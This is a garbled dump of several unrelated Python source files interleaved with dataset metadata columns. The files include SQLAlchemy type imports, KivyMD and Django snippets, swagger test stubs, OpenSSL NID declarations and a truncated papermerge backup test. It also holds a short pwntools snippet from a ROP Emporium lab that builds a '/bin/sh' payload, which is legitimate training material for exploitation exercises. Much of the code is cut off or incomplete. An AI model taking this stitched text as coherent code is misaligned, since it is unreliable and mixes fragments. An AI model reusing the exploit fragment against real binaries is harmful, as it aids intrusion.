# Copyright (C) 2005-2020 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Compatibility namespace for sqlalchemy.sql.types.
"""
__all__ = [
"TypeEngine",
"TypeDecorator",
"UserDefinedType",
"INT",
"CHAR",
"VARCHAR",
"NCHAR",
"NVARCHAR",
"TEXT",
"Text",
"FLOAT",
"NUMERIC",
"REAL",
"DECIMAL",
"TIMESTAMP",
"DATETIME",
"CLOB",
"BLOB",
"BINARY",
"VARBINARY",
"BOOLEAN",
"BIGINT",
"SMALLINT",
"INTEGER",
"DATE",
"TIME",
"String",
"Integer",
"SmallInteger",
"BigInteger",
"Numeric",
"Float",
"DateTime",
"Date",
"Time",
"LargeBinary",
"Boolean",
"Unicode",
"Concatenable",
"UnicodeText",
"PickleType",
"Interval",
"Enum",
"Indexable",
"ARRAY",
"JSON",
]
from .sql.sqltypes import _Binary # noqa
from .sql.sqltypes import ARRAY # noqa
from .sql.sqltypes import BIGINT # noqa
from .sql.sqltypes import BigInteger # noqa
from .sql.sqltypes import BINARY # noqa
from .sql.sqltypes import BLOB # noqa
from .sql.sqltypes import BOOLEAN # noqa
from .sql.sqltypes import Boolean # noqa
from .sql.sqltypes import CHAR # noqa
from .sql.sqltypes import CLOB # noqa
from .sql.sqltypes import Concatenable # noqa
from .sql.sqltypes import DATE # noqa
from .sql.sqltypes import Date # noqa
from .sql.sqltypes import DATETIME # noqa
from .sql.sqltypes import DateTime # noqa
from .sql.sqltypes import DECIMAL # noqa
from .sql.sqltypes import Enum # noqa
from .sql.sqltypes import FLOAT # noqa
from .sql.sqltypes import Float # noqa
from .sql.sqltypes import Indexable # noqa
from .sql.sqltypes import INT # noqa
from .sql.sqltypes import INTEGER # noqa
from .sql.sqltypes import Integer # noqa
from .sql.sqltypes import Interval # noqa
from .sql.sqltypes import JSON # noqa
from .sql.sqltypes import LargeBinary # noqa
from .sql.sqltypes import MatchType # noqa
from .sql.sqltypes import NCHAR # noqa
from .sql.sqltypes import NULLTYPE # noqa
from .sql.sqltypes import NullType # noqa
from .sql.sqltypes import NUMERIC # noqa
from .sql.sqltypes import Numeric # noqa
from .sql.sqltypes import NVARCHAR # noqa
from .sql.sqltypes import PickleType # noqa
from .sql.sqltypes import REAL # noqa
from .sql.sqltypes import SchemaType # noqa
from .sql.sqltypes import SMALLINT # noqa
from .sql.sqltypes import SmallInteger # noqa
from .sql.sqltypes import String # noqa
from .sql.sqltypes import STRINGTYPE # noqa
from .sql.sqltypes import TEXT # noqa
from .sql.sqltypes import Text # noqa
from .sql.sqltypes import TIME # noqa
from .sql.sqltypes import Time # noqa
from .sql.sqltypes import TIMESTAMP # noqa
from .sql.sqltypes import Unicode # noqa
from .sql.sqltypes import UnicodeText # noqa
from .sql.sqltypes import VARBINARY # noqa
from .sql.sqltypes import VARCHAR # noqa
from .sql.type_api import adapt_type # noqa
from .sql.type_api import to_instance # noqa
from .sql.type_api import TypeDecorator # noqa
from .sql.type_api import TypeEngine # noqa
from .sql.type_api import UserDefinedType # noqa
from .sql.type_api import Variant # noqa
| 28.637931
| 69
| 0.69988
| 426
| 3,322
| 5.42723
| 0.199531
| 0.166522
| 0.25692
| 0.445069
| 0.642301
| 0.413495
| 0.351211
| 0.351211
| 0.351211
| 0.351211
| 0
| 0.003005
| 0.198676
| 3,322
| 115
| 70
| 28.886957
| 0.865515
| 0.162854
| 0
| 0
| 0
| 0
| 0.119056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.533981
| 0
| 0.533981
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
71a90e4a7f809e73157b7c36c4db9ed5cec153ed
| 201
|
py
|
Python
|
libs/applibs/templates/tab/tab_one.py
|
leoobrabo/KivyMD-Project-Creator
|
13b4dd7dd9d88164af052ad91009bfd38660c27b
|
[
"MIT"
] | 51
|
2020-12-15T21:29:25.000Z
|
2022-03-31T11:41:38.000Z
|
libs/applibs/templates/tab/tab_one.py
|
leoobrabo/KivyMD-Project-Creator
|
13b4dd7dd9d88164af052ad91009bfd38660c27b
|
[
"MIT"
] | 8
|
2020-12-23T21:40:12.000Z
|
2021-10-04T11:57:16.000Z
|
libs/applibs/templates/tab/tab_one.py
|
Kulothungan16/KivyMD_Project_Creator
|
f96f1128800b19de4ad5941270fc2cfdbbbcf331
|
[
"MIT"
] | 14
|
2021-01-02T04:08:53.000Z
|
2022-02-15T19:36:59.000Z
|
from kivy.uix.floatlayout import FloatLayout
from kivymd.uix.tab import MDTabsBase
import utils
utils.load_kv("tab_one.kv")
class TabOne(FloatLayout, MDTabsBase):
"""
Tab Item One.
"""
| 15.461538
| 44
| 0.721393
| 27
| 201
| 5.296296
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174129
| 201
| 12
| 45
| 16.75
| 0.861446
| 0.064677
| 0
| 0
| 0
| 0
| 0.05814
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
71b4acb45792997110467999c5f1ef1345bdf700
| 2,430
|
py
|
Python
|
test/test_document_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
test/test_document_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
test/test_document_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
LEIA RESTful API for AI
Leia API # noqa: E501
OpenAPI spec version: 1.0.0
Contact:
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import leiaapi.generated
from leiaapi.generated.api.document_api import DocumentApi # noqa: E501
from leiaapi.generated.rest import ApiException
class TestDocumentApi(unittest.TestCase):
"""DocumentApi unit test stubs"""
def setUp(self):
self.api = DocumentApi() # noqa: E501
def tearDown(self):
pass
def test_create_document(self):
"""Test case for create_document
Uploads a document to the Leia API # noqa: E501
"""
pass
def test_delete_document(self):
"""Test case for delete_document
Deletes a document from Leia API # noqa: E501
"""
pass
def test_edit_document(self):
"""Test case for edit_document
Updates a document in Leia API # noqa: E501
"""
pass
def test_get_document(self):
"""Test case for get_document
Retrieves a document from Leia API # noqa: E501
"""
pass
def test_get_document_contents(self):
"""Test case for get_document_contents
Retrieves a document from Leia API # noqa: E501
"""
pass
def test_get_documents(self):
"""Test case for get_documents
Retrieves documents from Leia API (paginated) # noqa: E501
"""
pass
def test_get_documents_tags(self):
"""Test case for get_documents_tags
Retrieves documents' tags from Leia API # noqa: E501
"""
pass
def test_get_documents_zip(self):
"""Test case for get_documents_zip
Retrieves documents from Leia API (paginated) # noqa: E501
"""
pass
def test_tag_document(self):
"""Test case for tag_document
Tags a document # noqa: E501
"""
pass
def test_transform_document_async(self):
"""Test case for transform_document_async
Asynchronously converts a document within Leia API # noqa: E501
"""
pass
def test_untag_document(self):
"""Test case for untag_document
Untags an document # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 21.891892
| 72
| 0.616049
| 293
| 2,430
| 4.921502
| 0.255973
| 0.07767
| 0.083911
| 0.114424
| 0.472954
| 0.380028
| 0.287795
| 0.243412
| 0.243412
| 0.212205
| 0
| 0.027284
| 0.306173
| 2,430
| 110
| 73
| 22.090909
| 0.827995
| 0.455556
| 0
| 0.352941
| 1
| 0
| 0.007648
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.382353
| false
| 0.352941
| 0.147059
| 0
| 0.558824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 4
|
71be0fd9b196eac8f333a08469b0a799a94fdd2a
| 64
|
py
|
Python
|
sqs_polling/__init__.py
|
ohke/sqs-polling
|
858322126632da897a8911a484b0dd3980c23ca1
|
[
"MIT"
] | 5
|
2019-12-08T05:55:32.000Z
|
2022-02-05T21:19:19.000Z
|
sqs_polling/__init__.py
|
ohke/sqs-polling
|
858322126632da897a8911a484b0dd3980c23ca1
|
[
"MIT"
] | 5
|
2019-10-25T00:04:50.000Z
|
2021-11-13T21:15:55.000Z
|
sqs_polling/__init__.py
|
ohke/sqs-polling
|
858322126632da897a8911a484b0dd3980c23ca1
|
[
"MIT"
] | 2
|
2019-10-24T23:29:40.000Z
|
2021-07-14T10:24:18.000Z
|
from .sqs_polling import sqs_polling
__all__ = ["sqs_polling"]
| 16
| 36
| 0.78125
| 9
| 64
| 4.777778
| 0.555556
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 64
| 3
| 37
| 21.333333
| 0.767857
| 0
| 0
| 0
| 0
| 0
| 0.171875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
71d8e2809974cdd222385de62649d000e5f2b1a9
| 175
|
py
|
Python
|
media_security/urls.py
|
ss-aman/media_security
|
cd9be8c4d9cfeb4344b682b3a6c90eda620daaec
|
[
"MIT"
] | null | null | null |
media_security/urls.py
|
ss-aman/media_security
|
cd9be8c4d9cfeb4344b682b3a6c90eda620daaec
|
[
"MIT"
] | null | null | null |
media_security/urls.py
|
ss-aman/media_security
|
cd9be8c4d9cfeb4344b682b3a6c90eda620daaec
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.conf.urls.static import static
from .views import MediaView
urlpatterns = static(settings.MEDIA_URL, view=MediaView.as_view())
| 21.875
| 66
| 0.811429
| 25
| 175
| 5.6
| 0.56
| 0.142857
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108571
| 175
| 7
| 67
| 25
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
71dd92081875ae813a58400cfadfd10cfd87b51f
| 32
|
py
|
Python
|
modules/2.79/bpy/types/EnumPropertyItem.py
|
cmbasnett/fake-bpy-module
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
[
"MIT"
] | null | null | null |
modules/2.79/bpy/types/EnumPropertyItem.py
|
cmbasnett/fake-bpy-module
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
[
"MIT"
] | null | null | null |
modules/2.79/bpy/types/EnumPropertyItem.py
|
cmbasnett/fake-bpy-module
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
[
"MIT"
] | null | null | null |
EnumPropertyItem.value = None
| 8
| 29
| 0.78125
| 3
| 32
| 8.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 32
| 3
| 30
| 10.666667
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
e0990d13d566478218153e5175b692168716a36c
| 56
|
py
|
Python
|
Python/Tests/GlassTests/PythonTests/Python/StepPythonToNative_Repr/py_mod.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 404
|
2019-05-07T02:21:57.000Z
|
2022-03-31T17:03:04.000Z
|
Python/Tests/GlassTests/PythonTests/Python/StepPythonToNative_Repr/py_mod.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/GlassTests/PythonTests/Python/StepPythonToNative_Repr/py_mod.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
import cpp_mod
cpp_obj = cpp_mod.CppObj()
repr(cpp_obj)
| 14
| 26
| 0.785714
| 11
| 56
| 3.636364
| 0.545455
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 56
| 3
| 27
| 18.666667
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
e0b22856c8a14733888f373b9d1e3ace06dbf9fd
| 192
|
py
|
Python
|
np/__init__.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/__init__.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/__init__.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
"""
Documentation of some native numpy functions when called on Galois field arrays.
"""
from . import linalg
from .arithmetic import *
from .functions import *
from .linear_algebra import *
| 21.333333
| 80
| 0.765625
| 25
| 192
| 5.84
| 0.72
| 0.136986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161458
| 192
| 8
| 81
| 24
| 0.906832
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
e0d8fbec1ac257972e25b02c261472da625f4d33
| 8,565
|
py
|
Python
|
resource/pypi/cryptography-1.7.1/src/_cffi_src/openssl/nid.py
|
hipnusleo/Laserjet
|
f53e0b740f48f2feb0c0bb285ec6728b313b4ccc
|
[
"Apache-2.0"
] | null | null | null |
resource/pypi/cryptography-1.7.1/src/_cffi_src/openssl/nid.py
|
hipnusleo/Laserjet
|
f53e0b740f48f2feb0c0bb285ec6728b313b4ccc
|
[
"Apache-2.0"
] | null | null | null |
resource/pypi/cryptography-1.7.1/src/_cffi_src/openssl/nid.py
|
hipnusleo/Laserjet
|
f53e0b740f48f2feb0c0bb285ec6728b313b4ccc
|
[
"Apache-2.0"
] | null | null | null |
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/obj_mac.h>
"""
TYPES = """
static const int NID_undef;
static const int NID_dsa;
static const int NID_dsaWithSHA;
static const int NID_dsaWithSHA1;
static const int NID_md2;
static const int NID_md4;
static const int NID_md5;
static const int NID_mdc2;
static const int NID_ripemd160;
static const int NID_sha;
static const int NID_sha1;
static const int NID_sha256;
static const int NID_sha384;
static const int NID_sha512;
static const int NID_sha224;
static const int NID_sha;
static const int NID_ecdsa_with_SHA1;
static const int NID_ecdsa_with_SHA224;
static const int NID_ecdsa_with_SHA256;
static const int NID_ecdsa_with_SHA384;
static const int NID_ecdsa_with_SHA512;
static const int NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
static const int NID_X9_62_c2pnb163v1;
static const int NID_X9_62_c2pnb163v2;
static const int NID_X9_62_c2pnb163v3;
static const int NID_X9_62_c2pnb176v1;
static const int NID_X9_62_c2tnb191v1;
static const int NID_X9_62_c2tnb191v2;
static const int NID_X9_62_c2tnb191v3;
static const int NID_X9_62_c2onb191v4;
static const int NID_X9_62_c2onb191v5;
static const int NID_X9_62_c2pnb208w1;
static const int NID_X9_62_c2tnb239v1;
static const int NID_X9_62_c2tnb239v2;
static const int NID_X9_62_c2tnb239v3;
static const int NID_X9_62_c2onb239v4;
static const int NID_X9_62_c2onb239v5;
static const int NID_X9_62_c2pnb272w1;
static const int NID_X9_62_c2pnb304w1;
static const int NID_X9_62_c2tnb359v1;
static const int NID_X9_62_c2pnb368w1;
static const int NID_X9_62_c2tnb431r1;
static const int NID_X9_62_prime192v1;
static const int NID_X9_62_prime192v2;
static const int NID_X9_62_prime192v3;
static const int NID_X9_62_prime239v1;
static const int NID_X9_62_prime239v2;
static const int NID_X9_62_prime239v3;
static const int NID_X9_62_prime256v1;
static const int NID_secp112r1;
static const int NID_secp112r2;
static const int NID_secp128r1;
static const int NID_secp128r2;
static const int NID_secp160k1;
static const int NID_secp160r1;
static const int NID_secp160r2;
static const int NID_sect163k1;
static const int NID_sect163r1;
static const int NID_sect163r2;
static const int NID_secp192k1;
static const int NID_secp224k1;
static const int NID_secp224r1;
static const int NID_secp256k1;
static const int NID_secp384r1;
static const int NID_secp521r1;
static const int NID_sect113r1;
static const int NID_sect113r2;
static const int NID_sect131r1;
static const int NID_sect131r2;
static const int NID_sect193r1;
static const int NID_sect193r2;
static const int NID_sect233k1;
static const int NID_sect233r1;
static const int NID_sect239k1;
static const int NID_sect283k1;
static const int NID_sect283r1;
static const int NID_sect409k1;
static const int NID_sect409r1;
static const int NID_sect571k1;
static const int NID_sect571r1;
static const int NID_wap_wsg_idm_ecid_wtls1;
static const int NID_wap_wsg_idm_ecid_wtls3;
static const int NID_wap_wsg_idm_ecid_wtls4;
static const int NID_wap_wsg_idm_ecid_wtls5;
static const int NID_wap_wsg_idm_ecid_wtls6;
static const int NID_wap_wsg_idm_ecid_wtls7;
static const int NID_wap_wsg_idm_ecid_wtls8;
static const int NID_wap_wsg_idm_ecid_wtls9;
static const int NID_wap_wsg_idm_ecid_wtls10;
static const int NID_wap_wsg_idm_ecid_wtls11;
static const int NID_wap_wsg_idm_ecid_wtls12;
static const int NID_ipsec3;
static const int NID_ipsec4;
static const char *const SN_X9_62_c2pnb163v1;
static const char *const SN_X9_62_c2pnb163v2;
static const char *const SN_X9_62_c2pnb163v3;
static const char *const SN_X9_62_c2pnb176v1;
static const char *const SN_X9_62_c2tnb191v1;
static const char *const SN_X9_62_c2tnb191v2;
static const char *const SN_X9_62_c2tnb191v3;
static const char *const SN_X9_62_c2onb191v4;
static const char *const SN_X9_62_c2onb191v5;
static const char *const SN_X9_62_c2pnb208w1;
static const char *const SN_X9_62_c2tnb239v1;
static const char *const SN_X9_62_c2tnb239v2;
static const char *const SN_X9_62_c2tnb239v3;
static const char *const SN_X9_62_c2onb239v4;
static const char *const SN_X9_62_c2onb239v5;
static const char *const SN_X9_62_c2pnb272w1;
static const char *const SN_X9_62_c2pnb304w1;
static const char *const SN_X9_62_c2tnb359v1;
static const char *const SN_X9_62_c2pnb368w1;
static const char *const SN_X9_62_c2tnb431r1;
static const char *const SN_X9_62_prime192v1;
static const char *const SN_X9_62_prime192v2;
static const char *const SN_X9_62_prime192v3;
static const char *const SN_X9_62_prime239v1;
static const char *const SN_X9_62_prime239v2;
static const char *const SN_X9_62_prime239v3;
static const char *const SN_X9_62_prime256v1;
static const char *const SN_secp112r1;
static const char *const SN_secp112r2;
static const char *const SN_secp128r1;
static const char *const SN_secp128r2;
static const char *const SN_secp160k1;
static const char *const SN_secp160r1;
static const char *const SN_secp160r2;
static const char *const SN_sect163k1;
static const char *const SN_sect163r1;
static const char *const SN_sect163r2;
static const char *const SN_secp192k1;
static const char *const SN_secp224k1;
static const char *const SN_secp224r1;
static const char *const SN_secp256k1;
static const char *const SN_secp384r1;
static const char *const SN_secp521r1;
static const char *const SN_sect113r1;
static const char *const SN_sect113r2;
static const char *const SN_sect131r1;
static const char *const SN_sect131r2;
static const char *const SN_sect193r1;
static const char *const SN_sect193r2;
static const char *const SN_sect233k1;
static const char *const SN_sect233r1;
static const char *const SN_sect239k1;
static const char *const SN_sect283k1;
static const char *const SN_sect283r1;
static const char *const SN_sect409k1;
static const char *const SN_sect409r1;
static const char *const SN_sect571k1;
static const char *const SN_sect571r1;
static const char *const SN_wap_wsg_idm_ecid_wtls1;
static const char *const SN_wap_wsg_idm_ecid_wtls3;
static const char *const SN_wap_wsg_idm_ecid_wtls4;
static const char *const SN_wap_wsg_idm_ecid_wtls5;
static const char *const SN_wap_wsg_idm_ecid_wtls6;
static const char *const SN_wap_wsg_idm_ecid_wtls7;
static const char *const SN_wap_wsg_idm_ecid_wtls8;
static const char *const SN_wap_wsg_idm_ecid_wtls9;
static const char *const SN_wap_wsg_idm_ecid_wtls10;
static const char *const SN_wap_wsg_idm_ecid_wtls11;
static const char *const SN_wap_wsg_idm_ecid_wtls12;
static const char *const SN_ipsec3;
static const char *const SN_ipsec4;
static const int NID_subject_key_identifier;
static const int NID_authority_key_identifier;
static const int NID_policy_constraints;
static const int NID_ext_key_usage;
static const int NID_info_access;
static const int NID_key_usage;
static const int NID_subject_alt_name;
static const int NID_issuer_alt_name;
static const int NID_basic_constraints;
static const int NID_issuing_distribution_point;
static const int NID_certificate_issuer;
static const int NID_name_constraints;
static const int NID_crl_distribution_points;
static const int NID_certificate_policies;
static const int NID_inhibit_any_policy;
static const int NID_private_key_usage_period;
static const int NID_crl_number;
static const int NID_crl_reason;
static const int NID_invalidity_date;
static const int NID_delta_crl;
static const int NID_any_policy;
static const int NID_policy_mappings;
static const int NID_target_information;
static const int NID_no_rev_avail;
static const int NID_commonName;
static const int NID_countryName;
static const int NID_localityName;
static const int NID_stateOrProvinceName;
static const int NID_organizationName;
static const int NID_organizationalUnitName;
static const int NID_serialNumber;
static const int NID_surname;
static const int NID_givenName;
static const int NID_title;
static const int NID_generationQualifier;
static const int NID_dnQualifier;
static const int NID_pseudonym;
static const int NID_domainComponent;
static const int NID_pkcs9_emailAddress;
static const int NID_ad_OCSP;
static const int NID_ad_ca_issuers;
"""
FUNCTIONS = """
"""
MACROS = """
"""
CUSTOMIZATIONS = """
"""
| 37.077922
| 80
| 0.82265
| 1,395
| 8,565
| 4.72043
| 0.143369
| 0.342445
| 0.28489
| 0.345938
| 0.636295
| 0.382536
| 0.24738
| 0.119818
| 0.069704
| 0
| 0
| 0.099973
| 0.139288
| 8,565
| 230
| 81
| 37.23913
| 0.793272
| 0.020198
| 0
| 0.032258
| 0
| 0
| 0.979652
| 0.211694
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004608
| 0
| 0.004608
| 0.004608
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
e0e8194b9d64628661b24aaac673852294b84581
| 69
|
py
|
Python
|
heima/login.py
|
DARKZEYE/PythonNumOne
|
2f3065537071d87e4fead4b9f0670b8a3c8b00c9
|
[
"MIT"
] | null | null | null |
heima/login.py
|
DARKZEYE/PythonNumOne
|
2f3065537071d87e4fead4b9f0670b8a3c8b00c9
|
[
"MIT"
] | null | null | null |
heima/login.py
|
DARKZEYE/PythonNumOne
|
2f3065537071d87e4fead4b9f0670b8a3c8b00c9
|
[
"MIT"
] | null | null | null |
num1 = 19
num2 = 22
num6 = 9999
num3 = 666
num4 = 878
num8 = 10000
| 7.666667
| 12
| 0.623188
| 12
| 69
| 3.583333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.510204
| 0.289855
| 69
| 8
| 13
| 8.625
| 0.367347
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
e0f1e5fc01b721e10c67732d5b3ffa29d55aad7c
| 123
|
py
|
Python
|
Labs/RopEmporium/split-64.py
|
TeamUnderdawgs/BinaryExploitaion-For-CTFs
|
78041ecee680e27d8e7d9a696a3c53b362100af7
|
[
"WTFPL"
] | 9
|
2020-03-31T05:59:08.000Z
|
2022-02-23T03:17:56.000Z
|
Labs/RopEmporium/split-64.py
|
TeamUnderdawgs/BinaryExploitaion-For-CTFs
|
78041ecee680e27d8e7d9a696a3c53b362100af7
|
[
"WTFPL"
] | null | null | null |
Labs/RopEmporium/split-64.py
|
TeamUnderdawgs/BinaryExploitaion-For-CTFs
|
78041ecee680e27d8e7d9a696a3c53b362100af7
|
[
"WTFPL"
] | 3
|
2020-05-09T11:56:40.000Z
|
2021-12-30T07:13:03.000Z
|
from pwn import *
system = p64(0x0000000000400810)
payload = " /bin/sh".ljust(40," ")
payload += system
print payload
| 12.3
| 35
| 0.682927
| 15
| 123
| 5.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207921
| 0.178862
| 123
| 9
| 36
| 13.666667
| 0.623762
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 0
| 0
| 0
| 0.146341
| 0
| 0
| 0
| null | null | 0
| 0.2
| null | null | 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
460223d9fd1d99e0735076a73c169b0e9e7b60e4
| 15,082
|
py
|
Python
|
papermerge/test/test_backup_restore.py
|
w-michal/papermerge
|
14703c3316deea06696da041b7adc4bd0b15270b
|
[
"Apache-2.0"
] | null | null | null |
papermerge/test/test_backup_restore.py
|
w-michal/papermerge
|
14703c3316deea06696da041b7adc4bd0b15270b
|
[
"Apache-2.0"
] | null | null | null |
papermerge/test/test_backup_restore.py
|
w-michal/papermerge
|
14703c3316deea06696da041b7adc4bd0b15270b
|
[
"Apache-2.0"
] | 1
|
2020-12-04T20:41:59.000Z
|
2020-12-04T20:41:59.000Z
|
import io
import json
import os
from pathlib import Path
import tarfile
from django.test import TestCase
from papermerge.core.models import Document, Folder
from papermerge.core.storage import default_storage
from papermerge.test.utils import create_root_user
from papermerge.core.backup_restore import (
backup_documents,
_can_restore,
restore_documents,
build_tar_archive
)
# points to papermerge.testing folder
BASE_DIR = Path(__file__).parent
class TestBackupRestore(TestCase):
def setUp(self) -> None:
self.testcase_user = create_root_user()
def test_backup_single_document(self):
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc = Document.objects.create_document(
user=self.testcase_user,
title='berlin.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin.pdf',
parent_id=None,
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc.path.url(),
)
with io.BytesIO() as memoryfile:
backup_documents(memoryfile, self.testcase_user)
memoryfile.seek(0)
self.assertTrue(
_can_restore(memoryfile),
'generated backup.tar is not valid'
)
memoryfile.seek(0)
backup_file = tarfile.open(fileobj=memoryfile, mode='r')
backup_json = backup_file.extractfile('backup.json')
backup_info = json.loads(backup_json.read())
self.assertIsNotNone(
backup_info.get('documents'),
'backup.json did not have a key "documents"'
)
self.assertIs(
